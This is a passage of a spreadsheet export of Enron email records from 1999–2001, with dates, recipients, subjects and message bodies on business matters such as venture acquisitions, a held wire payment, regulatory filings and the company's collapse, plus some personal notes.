realize that Aaron only sent the Germany info to me.  So here it is...enjoy!_x000D_
_x000D_
Kelly, I'll drop off my FTs on the way to the final since I won't be able to_x000D_
attend your party after.  You will need to take them out of the rubberband_x000D_
before you recycle them!_x000D_
_x000D_
See you guys tomorrow...Good Luck!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jacqueline Kelly_x000D_
To: Jacqueline Kelly; 'Aaron Mednelson (E-mail) '; 'Aiaz Kazi (E-mail) ';_x000D_
'Charlotte Kwon (E-mail) '; 'Chris_Neale (E-mail) '; 'Chrystine Lee (E-mail)_x000D_
'; 'Deepika Shah (E-mail) '; 'Jeff Dasovich (E-mail) '; 'Jonathan Hudacko_x000D_
(E-mail) '; 'Kelly Davis (E-mail) '; 'Kimberely Kupiecki (E-mail) '; 'Marty_x000D_
Esarte (E-mail) '; 'Michael Smith (E-mail) '; 'Paul Brodie (E-mail) ';_x000D_
'Peter Devroede (E-mail) '_x000D_
Cc: ''langridg@haas.berkeley.edu ' '_x000D_
Sent: 12/10/99 2:36 PM_x000D_
Subject: RE: sf study group update_x000D_
_x000D_
_x000D_
_x000D_
From Jeff..._x000D_
 &lt;&lt;indonesia matrix.doc&gt;&gt;_x000D_
_x000D_
_x000D_
 - Germany.doc</t>
  </si>
  <si>
    <t>Wed, 25 Jul 2001 15:31:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.garland@enron.com'})</t>
  </si>
  <si>
    <t>RE: Amber and StorageApps Acquired</t>
  </si>
  <si>
    <t xml:space="preserve">Great job and great team. Stick to your guns going forward. Rick_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Garland, Kevin  _x000D_
Sent:	Wednesday, July 25, 2001 5:14 PM_x000D_
To:	Rice, Ken; Hannon, Kevin; Skilling, Jeff; Whalley, Greg; Buy, Rick; Crews, David; Golden, Mike; Gorte, David; Petersen, Randy; Donahue, Jeff; Fastow, Andrew; Howard, Kevin A.; Fallon, Jim; Hannon, Kevin_x000D_
Cc:	Sheldon, Steven; Hickey, Patrick; Paige, Barbara; 'stan@tta.com'_x000D_
Subject:	Amber and StorageApps Acquired_x000D_
_x000D_
In a absolutely dead tech market, two of the EBS portfolio companies announced they were being acquired today.  StorageApps is being acquired by Hewlett Packard for $350 million, and Amber Networks is being acquired by Nokia for $421 million.  If I am not mistaken, these are the 2 largest technology acquisitions of 2001 (where only a handful of acquisitions have been made in total all year)._x000D_
_x000D_
Net gains to Enron on both of these investments (which were both made in 2000) will be small, but the acquisitions are a verification of EBS Ventures ability to pick the best telecom investments in the market (no other single investor is in both of these deals).  Steven Sheldon and Patrick Hickey deserve tremendous credit for originating and managing these investments._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kevin Garland_x000D_
Enron Principal Investments_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 08:46:32 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Sanders Morris analyst piece on Enron</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schwieger, Jim _x000D_
Sent: Tuesday, November 13, 2001 10:42 AM_x000D_
To: Brawner, Sandra F._x000D_
Subject: FW: Sanders Morris analyst piece on Enron_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mrha, Jean _x000D_
Sent: Tuesday, November 13, 2001 10:12 AM_x000D_
To: Schwieger, Jim_x000D_
Subject: FW: Sanders Morris analyst piece on Enron_x000D_
_x000D_
_x000D_
_x000D_
Jim,_x000D_
_x000D_
Do you remember Rob Lloyd?  He know works at AIM Funds here in town.  Please read the piece below - I think it is well written and summarizes our sad situation succinctly._x000D_
_x000D_
Regards, Jean_x000D_
-----Original Message-----_x000D_
From: Lloyd, Robert J [mailto:Robert_Lloyd@AIMFUNDS.COM]_x000D_
Sent: Tuesday, November 13, 2001 9:41 AM_x000D_
To: Mrha, Jean_x000D_
Subject: Sanders Morris analyst piece on Enron_x000D_
_x000D_
_x000D_
Jean, _x000D_
_x000D_
Thought you'd find this interesting.  It's an excerpt from an analyst's note_x000D_
out this AM._x000D_
_x000D_
A Perspective: R.I.P. Enron:_x000D_
It took sixteen years to build Enron into a $63 billion asset powerhouse,_x000D_
but only 24 days for it to disintegrate._x000D_
_x000D_
The fatal flaw was the aggressive accounting and leveraging done in various_x000D_
off balance sheet partnerships (Special Purpose Entities), which apparently_x000D_
became too aggressive to fully disclose. Wall Street had no idea of their holdings,_x000D_
their leverage or their derivative exposures. The SPEs mutated into_x000D_
something beyond the pale, becoming a company within a company. This evidently began_x000D_
30 months ago when the new management regime (Skilling, Fastow, et al)_x000D_
sanctioned their evolution. Make no mistake: they were cleverly contrived. They_x000D_
involved conventional asset &amp; debt transfers off the books, coupled with fair value_x000D_
(asset mark-to-market) accounting and synthetic equity financing. This_x000D_
allowed for considerable earnings management and the appearance of cost-free equity._x000D_
_x000D_
If nothing else, they now appear in hindsight to have been vanity deals: very_x000D_
New Economy, very Virtual and very aggressive. But no clients ever complained,_x000D_
to our knowledge. Yet ENE clearly crossed the GAAP reporting lines, as the_x000D_
latest 8-K attests, and the dual role of the CFO (sitting on both sides of the_x000D_
table in the LJM transactions), profiting highly in the process, created in the LJM_x000D_
partnership natural conflicts of interest now being investigated by the SEC._x000D_
Because of this elementary mistake in any seasoned judgment, which passed_x000D_
muster at every level, the most successful energy company of the 90s was vaporized_x000D_
in the marketplace. The main thing that brought ENE down was hubris. It had_x000D_
used up all of its credibility when the partnerships were brought to light. If these_x000D_
were fully revealed two years ago, a collapse would have been very unlikely._x000D_
_x000D_
Rob Lloyd_x000D_
AIM Management_x000D_
713-214-4355_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 07:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>March 2001 Variance Report as of April 10, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Rick - _x000D_
_x000D_
attached is the variance report for the month of March; the actuals are for _x000D_
March only and as you can see we are 1.3 million over budget for the month; I _x000D_
sent Elizabeth an email about the Hardy budget but it appears as though his _x000D_
budget has not been added but we are now absorbing costs for his group;  I'll _x000D_
work with Elizabeth to find out the status of moving the Hardy budget into _x000D_
yours or do you want the budget moved into the Washington cost center; please _x000D_
let me know_x000D_
_x000D_
Eric_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 12:09:22 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: RE:  Enron Credit Inc -  New Account Documents Request</t>
  </si>
  <si>
    <t>Marie,_x000D_
_x000D_
This is a pre-existing CP of ECT that did a trade with ECI a while back.  It is my understanding that these can be set up automatically upon request._x000D_
_x000D_
Can we complete and revise as needed the attached prime broker agreements?_x000D_
_x000D_
Please let me know if this is a problem._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom_x000D_
_x000D_
-----Original Message-----_x000D_
From: Amado Lozano [mailto:ALozano@TWEISEL.com]_x000D_
Sent: Tuesday, November 13, 2001 1:08 PM_x000D_
To: Doukas, Tom_x000D_
Subject: FW: RE: Enron Credit Inc - New Account Documents Request_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Amado Lozano  _x000D_
&gt; Sent:	Wednesday, November 07, 2001 1:20 PM_x000D_
&gt; To:	'tom.doukas@enron.com'_x000D_
&gt; Subject:	RE:  Enron Credit Inc -  New Account Documents Request_x000D_
&gt; _x000D_
&gt;  &lt;&lt;PBRKCLER.pdf&gt;&gt; 	 &lt;&lt;LAS - TWP-043.pdf&gt;&gt; _x000D_
&gt; _x000D_
&gt; Per our conversation, attached is the Prime Brokerage Agreement and Letter_x000D_
&gt; of Authorized Signer.  Please complete and sign, once completed please fax_x000D_
&gt; to 415-364-7077.  If you have any questions, please call me at_x000D_
&gt; 415-364-2906.  Thank you._x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
___________________________________________________x000D_
_x000D_
Any information or data provided in this message has been obtained from_x000D_
sources we believe to be reliable, but we do not guarantee its accuracy or_x000D_
completeness.  Such information reflects current market conditions, is_x000D_
subject to change without notice and should not be relied upon for tax_x000D_
purposes.  Any transactional details are provided at your request and do not_x000D_
supersede your normal trade confirmations or monthly statements.  Any_x000D_
product recommended is subject to prior sale.  Additional information is_x000D_
available upon request._x000D_
_x000D_
Thomas Weisel Partners LLC, and/or officers, directors or employees, may at_x000D_
times have a position in or make a market in any security described above,_x000D_
and/or may act as an investment banker or advisor to any company referenced._x000D_
Thomas Weisel Partners LLC reserves the right to monitor and review the_x000D_
content of all e-mail communications sent and/or received by its employees._x000D_
_x000D_
Thomas Weisel Partners LLC does not accept time-sensitive transactional_x000D_
messages, including orders to buy and sell securities, via e-mail._x000D_
_x000D_
THIS TRANSMISSION CONTAINS INFORMATION INTENDED TO BE CONFIDENTIAL AND_x000D_
SOLELY FOR THE USE OF THOMAS WEISEL PARTNERS LLC, AND THOSE PERSONS OR_x000D_
ENTITIES TO WHOM IT IS DIRECTED.  IT IS NOT TO BE REPRODUCED, RETRANSMITTED,_x000D_
OR IN ANY OTHER MANNER DISTRIBUTED.  IF YOU RECEIVED THIS MESSAGE IN ERROR,_x000D_
PLEASE CONTACT THOMAS WEISEL PARTNERS LLC IMMEDIATELY BY CALLING_x000D_
415-364-2500. _x000D_
__________________________________________________</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:30:21 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Northwestern</t>
  </si>
  <si>
    <t>When do you think the payment's due?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:	Vos, Theresa_x000D_
Sent:	Mon 11/26/2001 9:22 AM_x000D_
To:	Garcia, Paul; Cothran, Robert; Swisher, Nera_x000D_
Cc:	Jacoby, Ben; Booth, Chris; Mann, Kay_x000D_
Subject:	RE: Northwestern_x000D_
_x000D_
Paul/Nera - please hold the wire for Montana Megawatts I, LLC for $5,064,535.00 that was scheduled for pmt today.  I will let you know when it is ok to release it._x000D_
_x000D_
thanks!_x000D_
theresa_x000D_
_x000D_
	 -----Original Message-----_x000D_
	From: 	Mann, Kay  _x000D_
	Sent:	Monday, November 26, 2001 8:54 AM_x000D_
	To:	Booth, Chris; Vos, Theresa; Jacoby, Ben_x000D_
	Subject:	Northwestern_x000D_
_x000D_
	By my calculation this payment is not due today.  I have advised Northwestern's attorney of this fact._x000D_
_x000D_
	Dave Duran wants to be advised prior to this money being sent._x000D_
_x000D_
	Thanks,_x000D_
_x000D_
	Kay</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 08:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Addition</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Edie,_x000D_
_x000D_
Can you add these slides to the Texas Gas Plan Presentation for 2001 behind _x000D_
pg. 10._x000D_
_x000D_
Call with questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
x3-0977_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 02/12/2001 04:34 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Bruce Sukaly@ENRON_x000D_
02/12/2001 04:31 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Slides_x000D_
_x000D_
Have Edie attach these to Tom's presentation.  _x000D_
</t>
  </si>
  <si>
    <t>Sun, 16 Sep 2001 15:41:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'coupon500@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'dkalman@rothers.com'})</t>
  </si>
  <si>
    <t>Friends._x000D_
_x000D_
L'ashana Tova. I hope you and yours are doing well. I will be lighting a_x000D_
yartezite candle tonight for the victims of this weeks tragedy._x000D_
_x000D_
-Dustin L. Kalman_x000D_
_x000D_
P.S. For you goyim that get this e-mail, I'm wishing you a happy new year_x000D_
(Jewish New Year) and a yartezite candle is a Jewish ritual mourning candle._x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:49:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kenton.erwin@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'dean.russell@enron.com', 'michael.mcdonald@enron.com', 'david.parquet@enron.com'})</t>
  </si>
  <si>
    <t>RE: Lodi Land Use</t>
  </si>
  <si>
    <t xml:space="preserve">Dave and Dean, I am forwarding the email to Richard Sanders.  Richard, this is FYI.  The Calif. State Atty Gen'l's office wanted to see the land use application in connection with our project development efforts in Lodi, CA.  We don't understand why that office would be interested.  If you have any concerns, please let me know; also, if we learn more about this, we will let you know._x000D_
 _x000D_
Christian, this is FYI re your California trading matters, in case this might be relevant._x000D_
 _x000D_
Kenton_x000D_
 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Parquet, David _x000D_
Sent: Wednesday, November 14, 2001 11:32 AM_x000D_
To: Erwin, Kenton; Russell, Dean; Mcdonald, Michael_x000D_
Cc: Calvert, Gray; Erwin, Kenton_x000D_
Subject: RE: Lodi Land Use_x000D_
_x000D_
_x000D_
Why don't we let richard Sanders know about this.  I agree with Kenton that someone is probably up to no good.  However, if I understand the document, it is (or will) probably be public one day anyway.  I would let Richard know just as an FYI and see what are his comments._x000D_
_x000D_
-----Original Message----- _x000D_
From: Erwin, Kenton _x000D_
Sent: Tue 11/13/2001 5:52 PM _x000D_
To: Russell, Dean; Mcdonald, Michael; Parquet, David _x000D_
Cc: Calvert, Gray; Erwin, Kenton _x000D_
Subject: RE: Lodi Land Use _x000D_
_x000D_
_x000D_
_x000D_
Who is Rad?  This is Lodi's application to itself for approval to use the plant site for a generating plant?  If the AG office wants to see it, I have trouble imagining a harmless reason:  I almost wonder if the AG is interested in whether the city would have legal authority to both apply and approve.  But somebody would have had to arouse the state's interest; who would do that?  PG&amp;E?_x000D_
_x000D_
If the application is a public document, then the state could easily get it anyway, so it's OK to send it, but why wouldn't the state have asked the city for it?_x000D_
_x000D_
Kenton _x000D_
  _x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Russell, Dean  _x000D_
Sent:   Tuesday, November 13, 2001 3:38 PM _x000D_
To:     Erwin, Kenton; Mcdonald, Michael; Parquet, David _x000D_
Cc:     Calvert, Gray _x000D_
Subject:        Lodi Land Use _x000D_
_x000D_
Gentlemen- _x000D_
FYI - Tim Murphy at URS called me today to let me know that Rad Bartlam called him and asked him to send a copy of the Lodi Land Use Application to the State Attorney General's Office.  Rad said he didn't know why they wanted it, and Tim has no clue either.  I told Tim it was OK to send it.  Any guesses as to why they want it?_x000D_
_x000D_
Dean </t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 05:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Palacios P.S.</t>
  </si>
  <si>
    <t xml:space="preserve">That Paul has a cloud over him.  At least he has time to heal before baseball _x000D_
season._x000D_
_x000D_
We are planning on spending Saturday night.  Neil and I will stay at the B &amp; _x000D_
B._x000D_
_x000D_
Enjoy this great weather.  I hear more rain is forecast for the weekend - _x000D_
hope they are wrong!_x000D_
_x000D_
Love,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bill and Rita McCall &lt;bmccall@wcnet.net&gt; on 11/20/2000 12:24:37 PM_x000D_
To: Kay.Mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Palacios P.S._x000D_
_x000D_
I forgot to tell you Paul was in a wreck Saturday afternoon late. He is_x000D_
O.K. except for a broken arm. He was with the Mayor of Palacios and his_x000D_
grandson. They were on the way to the high school and someone pulled out_x000D_
intothem. Mother_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 13:50:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Material for ICAPWG Sept 24 Meeting Agenda Item 2</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
"Robb, Kathy" &lt;KRobb@hunton.com&gt; writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
_x000D_
&gt; Enclosed for discussion are draft modifications to the ICAP Manual to_x000D_
&gt; conform the ICAP Manual sections regarding Control Area System Resources_x000D_
&gt; with those sections of the ICAP Manual governing the qualification of_x000D_
&gt; Generators.  Earlier this summer, the ICAPWG informally requested the_x000D_
&gt; NYISO Staff and a few members of the ICAPWG to prepare and propose such_x000D_
&gt; modifications.  John Charlton will present these documents for discussion_x000D_
&gt; at the ICAPWG meeting under item 2 of the Agenda, "Discussion of ICAP_x000D_
&gt; Developments."_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;CLEAN PROPOSED MODIFICATIONS TO ICAP MANUAL FOR 09-24.pdf&gt;&gt;_x000D_
&gt; &lt;&lt;BLACKLINED PROPOSED MODIFICATIONS TO ICAP MANUAL FOR 09-24.pdf&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - CLEAN PROPOSED MODIFICATIONS TO ICAP MANUAL FOR  _x000D_
 - BLACKLINED PROPOSED MODIFICATIONS TO ICAP MANUAL FOR  </t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 09:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FX Product</t>
  </si>
  <si>
    <t xml:space="preserve">Sara / Mark,_x000D_
_x000D_
I need an approval as soon as possible from you for the FX Description _x000D_
attached.  Steve Jacobellis is requesting that this gets out on the web as _x000D_
soon as possible.  _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Melba _x000D_
58986_x000D_
---------------------- Forwarded by Melba Lozano/HOU/ECT on 12/11/2000 05:53 _x000D_
PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Melba Lozano                                                           _x000D_
  11/30/2000 06:41 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT, William Stuart/HOU/ECT@ECT_x000D_
cc: Robert B Cass/HOU/ECT@ECT _x000D_
Subject: FX Product_x000D_
_x000D_
_x000D_
Sara:  Please approve on the attached language for the FX Product._x000D_
_x000D_
_x000D_
_x000D_
William:  There is a gap between hour ending 3:00 and 4:00 .  Do you want to _x000D_
go ahead and set up Central time to trade until Hour Ending 4:00?  Please let _x000D_
me know.  _x000D_
_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Melba_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 01:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'taffy.milligan@enron.com'})</t>
  </si>
  <si>
    <t>Annex to the 2000 ISDA Definitions</t>
  </si>
  <si>
    <t>(1)  I just received my copy of the Annex to the 2000 ISDA Definitions.  Have _x000D_
we previously distributed the "2000 ISDA Definitions" (consolidation of the _x000D_
1991, 1998 Supp. and certain other 1998 Euro Definitions)?_x000D_
_x000D_
(2)  I have the blue file for Swiss Bank/ENE.  We need to change the label in _x000D_
conformity with our procedures for mergers.  Taffy, can you handle, please?</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 01:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rebekah.rushing@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'don.khamapirad@enron.com', 'jeff.neil@enron.com', 'todd.roten@enron.com', 'mark.gandy@enron.com', 'jeff.foster@enron.com', 'rex.shelby@enron.com', 'steven.sheldon@enron.com', 'connie.lee@enron.com', 'david.maxwell@enron.com', 'daniel.pham@enron.com', 'michael.krautz@enron.com', 'stephen.barth@enron.com', 'kim.womack@enron.com', 'kevin.howard@enron.com', 'heriberto.murillo@enron.com', 'merat.bagha@enron.com', 'jim.crowder@enron.com', 'rob.brown@enron.com', 'steve.elliott@enron.com', 'joe.hirko@enron.com', 'david.cox@enron.com', 'patrick.hickey@enron.com', 'jeremy.mills@enron.com', 'david.crews@enron.com', 'john.griebling@enron.com', 'thomas.bremond@enron.com', 'suresh.vasan@enron.com', 'gil.melman@enron.com', 'andrew.marsden@enron.com', 'robin.hill@enron.com', 'kristina.mordaunt@enron.com', 'ken.rice@enron.com', 'kevin.garland@enron.com', 'carolyn.barrett@enron.com', 'rebekah.rushing@enron.com', 'amin.maredia@enron.com', 'scott.yeager@enron.com', 'john.bloomer@enron.com', 'michele.marvin@enron.com', 'scott.pleus@enron.com', 'matt.harris@enron.com'})</t>
  </si>
  <si>
    <t>EBS Ventures weekly deal tracking sheet</t>
  </si>
  <si>
    <t>Following is the EBS Ventures deal tracking sheet for this week._x000D_
_x000D_
_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Rebekah Rushing (rebekah_rushing@enron.net)_x000D_
Enron Broadband Services _x000D_
Broadband Ventures group_x000D_
713-853-3273 - phone_x000D_
713-646-8010 - fax</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 00:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sscott3@enron.com', 'joe.gordon@enron.com', 'pat.shortridge@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'rogers.herndon@enron.com', 'linda.robertson@enron.com', 'george.wood@enron.com', 'charles.decker@enron.com', 'mark.bernstein@enron.com', 'john.shelk@enron.com', 'karen.denne@enron.com', 'dave.mangskau@enron.com', 'mason.hamlin@enron.com', 'gautam.gupta@enron.com', 'edward.baughman@enron.com', 'donna.fulton@enron.com', 'andy.rodriquez@enron.com', 'dave.perrino@enron.com', 'pearce.hammond@enron.com', 'sarah.novosel@enron.com', 'mpalmer@enron.com', 'garrett.tripp@enron.com', 'jeff.ader@enron.com', 'john.llodra@enron.com', 'lloyd.will@enron.com', 'chris.long@enron.com', 'steve.montovano@enron.com', 'janelle.scheuer@enron.com', 'rob.wheeler@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'aleck.dadson@enron.com', 'berney.aucoin@enron.com', 'narsimha.misra@enron.com', 'jason.thompkins@enron.com', 'steven.kean@enron.com', 'louise.kitchen@enron.com', 'kathleen.sullivan@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'tom.may@enron.com', 'mbrown9@enron.com', 'howard.fromer@enron.com', 'mike.roan@enron.com', 'paul.broderick@enron.com', 'mark.davis@enron.com', 'susan.landwehr@enron.com', 'daniel.allegretti@enron.com', 'greg.whalley@enron.com', 'jim.meyn@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'john.lavorato@enron.com', 'christi.nicolay@enron.com', 'w.duran@enron.com', 'nick.politis@enron.com', 'robert.stalford@enron.com', 'kerry.stroup@enron.com', 'susan.j.mara@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>PJM RTO Order</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a summary of the PJM RTO order.  While it is somewhat lengthy, _x000D_
the order has a lot of good information in it that I wanted to share with the _x000D_
group, particularly the Commission's statements regarding the existing _x000D_
configuration of the northeast and the need to expand it._x000D_
_x000D_
We are working on summaries of the New York and New England RTO orders and _x000D_
will have those out shortly.  If you would like copies of the orders, just _x000D_
let us know._x000D_
_x000D_
We expect the mediation proceeding to begin within the next week.  We will _x000D_
keep you updated._x000D_
_x000D_
Sarah_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 07:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DISREGARD LAST EMAIL ENA/NorthWestern: Revised Letter Agreement and_x000D_
 Exhibits</t>
  </si>
  <si>
    <t xml:space="preserve">These are the current drafts, not the ones I sent earlier._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/12/2001 02:58 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 04/11/2001 08:27:55 PM_x000D_
To: "'JeremiahDeberry@paulhastings.com'" &lt;JeremiahDeberry@paulhastings.com&gt;, _x000D_
"'Michael.Young@northwestern.com'" &lt;Michael.Young@northwestern.com&gt;, _x000D_
"'MargueriteKahn@paulhastings.com'" &lt;MargueriteKahn@paulhastings.com&gt;_x000D_
cc: "'Chris.Booth@enron.com'" &lt;Chris.Booth@enron.com&gt;, _x000D_
"'Ben.Jacoby@enron.com'" &lt;Ben.Jacoby@enron.com&gt;, "'Kay.Mann@enron.com'" _x000D_
&lt;Kay.Mann@enron.com&gt;, "Keffer, John" &lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: ENA/NorthWestern: Revised Letter Agreement and Exhibits_x000D_
_x000D_
_x000D_
I am attaching for your review marked and clean copies of the following_x000D_
documents:_x000D_
_x000D_
1. Letter Agreement between Enron North America Corp. and NorthWestern_x000D_
Generation I, LLC;_x000D_
2. ENA Promissory Note (Exhibit A);_x000D_
3. First Amended and Restated LLC Agreement (Exhibit C);_x000D_
4. Escrow Agreement (Exhibit F); and_x000D_
5. ENA Guaranty (Exhibit G)._x000D_
_x000D_
In addition, I am attaching a preliminary draft of Enron's form of_x000D_
Assignment and Assumption Agreement (Exhibit B) with the caveat that the_x000D_
document remains subject to changes pending further review by Enron.  Please_x000D_
note that I am not attaching (1) a copy of the GE Guaranty (Exhibit E)_x000D_
because we are satisfied with Paul Hasting's draft of this document and (2)_x000D_
the LLC Promissory Note (Exhibit D) because Marguerite will circulate this_x000D_
document as soon as she is done preparing it._x000D_
_x000D_
Don't hesitate to contact me if you have any questions._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Marisa Reuter_x000D_
King &amp; Spalding_x000D_
1100 Louisiana, Suite 3300_x000D_
713-751-3244 (tel)_x000D_
713-276-7440 (fax)_x000D_
_x000D_
 &lt;&lt;LetterAgreement.DOC&gt;&gt;  &lt;&lt;MarkedLetterAgreement.DOC&gt;&gt;  &lt;&lt;ENANote.DOC&gt;&gt;_x000D_
&lt;&lt;MarkedENANote.DOC&gt;&gt;  &lt;&lt;LLCAgmt.DOC&gt;&gt;  &lt;&lt;MarkedLLCAgmt.DOC&gt;&gt;_x000D_
&lt;&lt;EscrowAgmt.DOC&gt;&gt;  &lt;&lt;MarkedEscrowAgmt.DOC&gt;&gt;  &lt;&lt;ENAGuaranty.DOC&gt;&gt;_x000D_
&lt;&lt;MarkedENAGuaranty.DOC&gt;&gt;  &lt;&lt;Assignment&amp;AssumptionAgmt.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
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 LetterAgreement.DOC_x000D_
 - MarkedLetterAgreement.DOC_x000D_
 - ENANote.DOC_x000D_
 - MarkedENANote.DOC_x000D_
 - LLCAgmt.DOC_x000D_
 - MarkedLLCAgmt.DOC_x000D_
 - EscrowAgmt.DOC_x000D_
 - MarkedEscrowAgmt.DOC_x000D_
 - ENAGuaranty.DOC_x000D_
 - MarkedENAGuaranty.DOC_x000D_
 - Assignment&amp;AssumptionAgmt.DOC_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 13:18:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.darveaux@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'teb.lokey@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>FW: Transwestern Proposed Tariff Sheets for Settlement</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
	See attached tariff sheets:   Revised Sheet Nos. 18, 19 and 20 reflect ROFR process only_x000D_
				     New Tariff Sheet No.  ____ Section 35 - Capacity Posting_x000D_
_x000D_
			    _x000D_
	Please provide comments by noon on October 5 2001._x000D_
_x000D_
Mary Darveaux_x000D_
Rates &amp; Tariff ETS _x000D_
Enron_x000D_
mary.darveaux@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 09:13:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'j..broderick@enron.com', 'iris.mack@enron.com', 'diana.allen@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'l..day@enron.com', 'hicham.benjelloun@enron.com', 'harry.arora@enron.com', 'dean.laurent@enron.com', 'reese.trejo@enron.com', 'seung-taek.oh@enron.com', 'david.ingram@enron.com', 'joe.quenet@enron.com', 'william.abler@enron.com', 'andrew.greer@enron.com', 'j..sturm@enron.com', 'gustavo.giron@enron.com', 'claudia.guerra@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'e..kelly@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'utku.gulmeden@enron.com', 'william.freije@enron.com', 'cory.willis@enron.com', 'alexander.mcelreath@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'chris.lenartowicz@enron.com', 'terri.clynes@enron.com', 'mike.zipperer@enron.com', 'd..thomas@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@enron.com', 'lisa.zarsky@enron.com', 'tina.holcombe@enron.com', 'bill.rust@enron.com', 'joe.capasso@enron.com', 'steve.pan@enron.com', 'anubhav.aggarwal@enron.com', 'claudette.harvey@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'punit.rawal@enron.com', 'lorie.leigh@enron.com', 'erik.serio@enron.com', 'willis.philip@enron.com', 'jae.black@enron.com', 'daniel.jenkins@enron.com', 'patrick.hanse@enron.com', 'dana.davis@enron.com', 